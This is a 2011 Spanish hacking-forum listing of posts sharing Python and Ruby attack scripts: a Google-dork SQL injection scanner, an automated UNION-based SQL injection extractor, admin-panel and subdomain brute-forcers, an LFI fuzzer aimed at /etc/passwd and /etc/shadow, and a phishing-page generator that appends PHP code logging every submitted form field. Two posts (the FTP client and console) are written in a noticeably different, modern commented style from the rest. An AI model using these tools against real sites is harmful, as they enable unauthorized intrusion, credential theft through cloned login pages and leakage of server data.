|
401
|
Programación / Scripting / [Python] Google Inyector By dODDY h
|
en: 7 Octubre 2011, 01:36 am
|
Bueno , acabo de hacer un scanner de sqli. Este busca en google paginas con un dork marcado por ustedes , para despues borrar repetidos y scanear las webs encontradas #!usr/bin/python #Google Iny (C) Doddy Hackman 2011 import urllib2,re,os,sys def head(): print "\n\n -- == Google Iny == --\n" def copyright(): print "\n(C) Doddy Hackman 2011\n" sys.exit(1) def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def show(): print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n" def limpiar(pag): limpia = [] for p in pag: if not (re.findall("http://www.google.com.ar",p,re.I)): if p not in limpia: limpia.append(p) return limpia def sql(webs): for web in webs : if re.findall("=",web): web = re.split("=",web) web = web[0]+"=" try: code = toma(web+"-1+union+select+1--") if (re.findall("The used SELECT statements have a different number of columns",code,re.I)): print "[SQLI] : ",web,"\n" except: pass def scan(dork,count): pag = [] s = 10 while s <= int(count): try: code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s)) d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code) s += 10 for a in d: pag.append(a) except: copyright() pag = limpiar(pag) return pag head() if len(sys.argv) != 3: show() else : print "\n[+] SQL Scan Started\n" print "[+] Dork : ",sys.argv[1] print "[+] Count : ",sys.argv[2] pages = scan(sys.argv[1],sys.argv[2]) print "\n[+] Webs Found : ",len(pages),"\n" sql(pages) copyright()
|
|
|
402
|
Programación / Scripting / [Python] Fuzz DNS By Doddy H
|
en: 7 Octubre 2011, 01:34 am
|
Hola a todos. Aca les dejo un simple buscador de dns , solo ponen el dominio y esta cosita se encarga de buscarlas. #!usr/bin/python #LFI T00l (C) Doddy Hackman import os,sys,urllib2,re dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc'] def header() : print "\n--== Fuzz DNS ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : 
return urllib2.urlopen(web).read() def search(web): print "\n[+] Searching DNS in",web,"\n" try: for d in dns: toma("http://"+d+"."+web) print "[DNS Link] : http://"+d+"."+web except: pass header() if len(sys.argv) != 2 : show() else : search(sys.argv[1]) copyright() #The End
Ejemplo de uso C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com
--== Fuzz DNS ==--
[+] Searching DNS in google.com
[DNS Link] : http://www.google.com
(C) Doddy Hackman 2010
|
|
|
403
|
Programación / Scripting / [Python] FTP Manager
|
en: 7 Octubre 2011, 01:34 am
|
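#!/usr/bin/python
# Post text: "Hola Aca traigo un simple cliente FTP" (here is a simple FTP client).
# FTP Manager 0.2 (C) Doddy Hackman 2011
#
# Interactive FTP client: logs in with the host, user and password given on
# the command line, then serves a numbered menu of directory and file
# operations until option 9 is chosen.
#
# NOTE(security): plain FTP sends the user name, the password and every
# command unencrypted, and a password passed as a command-line argument is
# visible to other local users in the process list. Where the server
# supports it, ftplib.FTP_TLS (followed by prot_p()) is the safer transport.

from ftplib import FTP, all_errors
import sys

# Python 2's input() evaluates whatever is typed as a Python expression, so
# the menu prompt must never use it. raw_input (Python 2) and input
# (Python 3) both return the typed text unchanged.
try:
    read_line = raw_input
except NameError:
    read_line = input


def head():
    """Print the program banner."""
    print("\n -- == FTP Manger == --\n\n")


def copyright():
    """Print the copyright notice and terminate with exit status 1."""
    print("\n\n(C) Doddy Hackman 2011\n")
    sys.exit(1)


def show():
    """Print the command-line usage."""
    print("\nSintax : " + sys.argv[0] + " <host> <user> <pass>\n")


def menu():
    """Print the option list and return the chosen number.

    Returns None when the answer is not an integer, which the caller treats
    like any other unknown option (the menu is shown again).
    """
    print("\n")
    print("1 : dir")
    print("2 : cwd")
    print("3 : chdir")
    print("4 : delete dir")
    print("5 : delete file")
    print("6 : rename file")
    print("7 : make directory")
    print("8 : size")
    print("9 : abort\n\n")
    answer = read_line("[Option] : ")
    try:
        return int(answer)
    except ValueError:
        return None


def enter(host, user, password):
    """Log in to *host* and run the menu until the user picks option 9.

    The menu runs in a loop rather than by recursion: in the recursive form
    every earlier frame sat inside a bare ``except``, which swallowed the
    SystemExit raised by option 9 and re-opened the menu on a closed
    connection. Only ftplib's own error set is caught here, and the error is
    reported instead of being dropped.
    """
    print("[+] Connecting to  %s \n" % host)
    try:
        ftp = FTP(host, user, password)
    except all_errors as err:
        print("\n[-] Connection failed : %s\n" % err)
        copyright()
    print("\n[+] Enter in the system\n")

    while True:
        op = menu()

        if op == 9:
            try:
                ftp.quit()
            except all_errors:
                # The server may already have dropped the session.
                ftp.close()
            copyright()

        try:
            if op == 1:
                # FTP.dir() writes the listing to stdout itself and returns
                # None, so there is nothing to iterate over.
                ftp.dir()
            elif op == 2:
                print("\n\n[+] Path : " + ftp.pwd() + "\n\n")
            elif op == 3:
                target = read_line("\n\n[Directory] : ")
                ftp.cwd(target)
                print("\n\n[+] Directory Changed\n\n")
            elif op == 4:
                target = read_line("\n\n[Directory] : ")
                ftp.rmd(target)
                print("\n\n[+] Directory Deleted\n\n")
            elif op == 5:
                name = read_line("\n\n[File] : ")
                ftp.delete(name)
                print("\n\n[+] File Deleted\n\n")
            elif op == 6:
                old_name = read_line("\n\n[Name] : ")
                new_name = read_line("\n[New Name] : ")
                ftp.rename(old_name, new_name)
                print("\n\n[+] Name Changed\n\n")
            elif op == 7:
                target = read_line("\n\n[New Directory] : ")
                ftp.mkd(target)
                print("\n\n[+] Directory Created\n\n")
            elif op == 8:
                name = read_line("\n\n[File] : ")
                # The FTP SIZE reply is a byte count, not kilobytes.
                size = ftp.size(name)
                print("\n\n[+]  %s  bytes \n\n" % size)
            # Any other value simply shows the menu again.
        except all_errors as err:
            print("\n[-] FTP error : %s\n" % err)


head()
if len(sys.argv) != 4:
    show()
else:
    enter(sys.argv[1], sys.argv[2], sys.argv[3])
copyright()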
|
|
|
404
|
Programación / Scripting / [Python] Finder Admin By Doddy H
|
en: 7 Octubre 2011, 01:33 am
|
Hola a todos. Hoy termine un script en python para buscar el famoso panel de administraction #!usr/bin/python #Finder Admin (C) Doddy Hackman import sys,httplib,os os.system("cls") panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','
moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpr
o/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'] def header() : print "\n--== Finder Admin ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) header() def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web,path): nave = httplib.HTTPConnection(web) nave.request("GET","/"+path) return nave.getresponse().status def buscar(web): print "\n[+] Target : ",web,"\n\n" for path in panels: try: code = toma(web,path) if code ==200: print "[Link] : "+web+"/"+path except(KeyboardInterrupt): copyright() except: pass if len(sys.argv) != 2 : show() else: buscar(sys.argv[1]) copyright() #The End
Un ejemplo de uso seria python finder.py 127.0.0.1
--== Finder Admin ==--
[+] Target : 127.0.0.1
[Link] : 127.0.0.1/admin/ [Link] : 127.0.0.1/login.php [Link] : 127.0.0.1/phpmyadmin/
(C) Doddy Hackman 2010
Eso si no usen http:// en la web que quieran escanear , ejemplo www.google.com.ar
|
|
|
405
|
Programación / Scripting / [Python] Easy Inyector By Doddy H
|
en: 7 Octubre 2011, 01:33 am
|
Bueno esta es la primera version de este simple programa que hice en perl , en la siguiente version le agregare otras cosas y podra scanear varios en un archivo de texto. Esta cosa busca: * Vulnerabilidad (obvio) * Limite de columnas * Informacion sobre la base de datos * Automaticamente buscar el numero que permite mostrar informacion * Verifica existencia de mysql.user y information.schema.tables #!usr/bin/python #Easy Inyector (C) Doddy Hackman 2010 import os,sys,urllib2,re def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def header() : print "\n--== Easy Inyector ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" sys.exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : return urllib2.urlopen(web).read() def bypass(bypass): if bypass == "--": return("+","--") elif bypass == "/*": return("/**/","/*") else: return("+","--") def more(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Searching more data\n" web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web) code0 = toma(web1) if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)): datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0) datar = re.split("K0BRA",datax[0]) print "[+] Username :",datar[1] print "[+] Database :",datar[2] print "[+] Version :",datar[3],"\n" code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if (re.findall("K0BRA",code1)): print "[+] mysql.user : on" code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if (re.findall("K0BRA",code2)): print "[+] information_schema.tables : on" def findlength(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Finding columns length" number = "concat(0x4b30425241,1,0x4b30425241)" for te in range(2,30): number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)" code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2) if 
(re.findall("K0BRA(.*?)K0BRA",code)): numbers = re.findall("K0BRA(.*?)K0BRA",code) print "[+] Column length :",te print "[+] Numbers",numbers,"print data" sql = "" tex = te + 1 for sqlix in range(2,tex): sql = str(sql)+","+str(sqlix) sqli = str(1)+sql sqla = re.sub(numbers[0],"hackman",sqli) more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx) print "\n[+] Scan Finished\n" sys.exit(1) print "[-] Length dont found\n" def scan(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Testing vulnerability" code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2) if (re.findall("The used SELECT statements have a different number of columns",code,re.I)): print "[+] SQLI Detected" findlength(web,passx) else: print "[-] Not Vulnerable" copyright() header() if len(sys.argv) != 2 : show() else : try: scan(sys.argv[1],"--") except: copyright() #The End
Ejemplo de uso C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=
--== Easy Inyector ==--
[+] Testing vulnerability [+] SQLI Detected
[+] Finding columns length [+] Column length : 3 [+] Numbers ['1', '2', '3'] print data
[+] Searching more data
[+] Username : root@localhost [+] Database : hackman [+] Version : 5.1.41
[+] mysql.user : on [+] information_schema.tables : on
[+] Scan Finished
(C) Doddy Hackman 2010
|
|
|
406
|
Programación / Scripting / [Python] Console By Doddy H
|
en: 7 Octubre 2011, 01:32 am
|
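#!/usr/bin/python
# Post text: "Bueno este es un simple ejecutor de comandos hecho en tk"
# (a simple command runner built with Tk).
# Console (C) Doddy Hackman 2011
#
# Small Tk window with one entry field: the text typed there is run as a
# shell command on the local machine and its output is appended to the text
# panel.
#
# NOTE(security): the command string is handed to the system shell
# (shell=True) exactly as typed. That is the purpose of a console, but it
# means this widget must only ever receive text from the local user and
# never from a file, a network peer or another program.

try:
    from Tkinter import *  # Python 2 module name
except ImportError:
    from tkinter import *  # Python 3 module name
import subprocess


def execa():
    """Run the command in the entry field and append its output to the panel.

    communicate() closes the child's stdin and drains stdout and stderr
    together, so a command that reads stdin or writes a lot to stderr cannot
    stall the read. The call still blocks the GUI until the command exits.
    """
    proc = subprocess.Popen(
        cmd.get(),
        shell=True,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        universal_newlines=True,  # text output on both Python 2 and 3
    )
    out, err = proc.communicate()
    panel.insert(END, out)
    # A Popen object is always truthy, so testing it never reached the
    # stderr branch; error output is now shown whenever there is any.
    if err:
        panel.insert(END, err)


window = Tk()
window.title("Console (C) Doddy Hackman 2011")
window.maxsize(width="400", height="320")
window.minsize(width="400", height="320")
window.configure(background="black")
window.configure(cursor="tcross")

cmd = StringVar()
panel = Text(window, width=30, height=15, bg="black", fg="green")

Label(window, bg="black").grid(row=1)
Label(window, text="Command : ", bg="black", fg="green").grid(row=3, column=4)
# grid() returns None, so its result is not kept.
Entry(window, width=35, textvariable=cmd, bg="black", fg="green").grid(row=3, column=5)
Button(window, text="Cargar", bg="black", fg="green", activebackground="green", command=execa).grid(row=3, column=9)
Label(window, bg="black").grid(row=4)
panel.grid(row=10, column=5)

window.mainloop()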
|
|
|
407
|
Programación / Scripting / [Ruby] SQLI Scanner
|
en: 7 Octubre 2011, 01:32 am
|
Un scanner de SQLI en ruby #!usr/bin/ruby #SQLI Scannerl (C) Doddy Hackman 2010 #contact me : doddy-hackman.blogspot.com require 'net/http' def uso print "\n[+] sqli.rb <site>\n" end def toma(host,path) http = Net::HTTP.new(host,80) return http.get(path).body end def details(web,more) web1 = more.sub(/hackman/,"0x4b30425241") more = more.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)") print "\n\n[+] Extrating information of the DB\n\n" url = URI.parse(web) code = toma(url.host,url.path+"?"+url.query+more) if code=~/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/ print "[username] : "+$1+"\n" print "[database] : "+$2+"\n" print "[version] : "+$3+"\n\n" test1 = toma(url.host,url.path+"?"+url.query+web1+"+from+information_schema.tables") test2 = toma(url.host,url.path+"?"+url.query+web1+"+from+mysql.user") if test1=~/K0BRA/ print "[information_schema.tables] : ON\n" end if test2=~/K0BRA/ print "[mysql.user] : ON" end else print "\n[-] Not Found\n\n" end end def scan(web) print "\n[+] Testing the vulnerability SQLI...\n\n" url = URI.parse(web) codetest = toma(url.host,url.path+"?"+url.query+"-1+union+select+1") if codetest=~/The used SELECT statements have a different number of columns/ print "[+] SQLI Detected\n\n" else print "[-] Not Vulnerable to SQLI\n\n" copyright() end z = "1" x = "concat(0x4b30425241,1,0x4b30425241)" for num in ('2'..'25') z = z+","+num x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)" #print url.host,url.path+"?"+url.query+"-1+union+select+"+x+"\n" code = toma(url.host,url.path+"?"+url.query+"-1+union+select+"+x) if code=~/K0BRA(.*?)K0BRA/ print "[+] The Page has "+num+" columns\n" print "[+] The number "+$1+" print data\n\n" z = z.sub($1,"hackman") print "[SQLI] : "+web+"-1+union+select+"+z details(web,"-1+union+select+"+z) copyright() end end print "\n\n[-] Not Found the numbers of the columns\n\n" copyright() end def head() print "\n\n -- == SQLI Scanner == --\n\n" end def copyright() print 
"\n\n\n(C) Doddy Hackman 2010\n\n" exit(1) end head() if !ARGV[0] uso() else scan(ARGV[0]) copyright() end copyright()
|
|
|
408
|
Programación / Scripting / [Ruby] Phishing Gen
|
en: 7 Octubre 2011, 01:31 am
|
Un generador de fakes #!usr/bin/ruby #PHishing Gen (C) Doddy Hackman 2010 #contact me : doddy-hackman.blogspot.com require 'net/http' def uso print "\n[+] fake.rb <site> <result>\n" end def toma(web) return Net::HTTP.get(web) end def savefile(filename,text) files = File.open(filename,'a') files.puts text end def gen(web,file,magic) print "\n\n[+] Getting the source...\n" begin code = toma(URI.parse(web)) savefile(file,code+"\n"+magic) print "[+] Finish" copyright() end end def head() print "\n\n -- == Phising Gen == --\n\n" end def copyright() print "\n\n\n(C) Doddy Hackman 2010\n\n" exit(1) end head() if !ARGV[0] and !ARGV[1] uso() else text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>' gen(ARGV[0],ARGV[1],text) end copyright()
|
|
|
409
|
Programación / Scripting / [Ruby] Panel Control
|
en: 7 Octubre 2011, 01:31 am
|
Un buscador de panel de administracion #!usr/bin/ruby #Panel cONTROL (C) Doddy Hackman 2010 #contact me : doddy-hackman.blogspot.com panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderat
or/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadm
in/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'] require 'net/http' def uso print "\n[+] panelcontol.rb <site>\n" end def toma(web) return Net::HTTP.get_response(web) end def scan(web,panels) print "\n[+] Starting the scan...\n\n\n" panels.each do |panel| begin begin code = toma(URI.parse(web+"/"+panel)) rescue copyright() end case code when Net::HTTPSuccess print "[Link] : "+web+"/"+panel+"\n" end end end end def head() print "\n\n -- == Panel Control == --\n\n" end def copyright() print "\n\n\n(C) Doddy Hackman 2010\n\n" exit(1) end head() if !ARGV[0] uso() else scan(ARGV[0],panels) end copyright()
|
|
|
410
|
Programación / Scripting / [Ruby] LFI T00l
|
en: 7 Octubre 2011, 01:30 am
|
Un scanner de LFI #!usr/bin/ruby #LFI tool (C) Doddy Hackman 2010 #contact me : doddy-hackman.blogspot.com require 'net/http' def uso print "\n[+] lfi.rb <site>\n" end def toma(host,path) http = Net::HTTP.new(host,80) return http.get(path).body end def fuzz(web) files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/l
ogs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc'] files.each do |file| begin url = URI.parse(web) code = toma(url.host,url.path+"?"+url.query+file) if not code=~/No such file or directory in/ print "[Link] : "+web+file+"\n" end end end end def scan(web) print "\n[+] Testing the vulnerability LFI...\n\n" begin url = URI.parse(web) code = toma(url.host,url.path+"?"+url.query+"'") if code=~/No such file or directory in/ saca = code.split("No such file or directory in <b>") saca = saca[1].split("<\/b> on line") print "[+] LFI Detected\n\n" print "[Full Path Discloure]: "+saca[0]+"\n" print "\n\n[+] Fuzzing Files\n\n" fuzz(web) print "\n[+] Finish\n" copyright() else print "[-] Not 
Vulnerable to LFI\n\n" end end end def head() print "\n\n -- == LFI tOOL == --\n\n" end def copyright() print "\n\n\n(C) Doddy Hackman 2010\n\n" exit(1) end head() if !ARGV[0] uso() else scan(ARGV[0]) end copyright()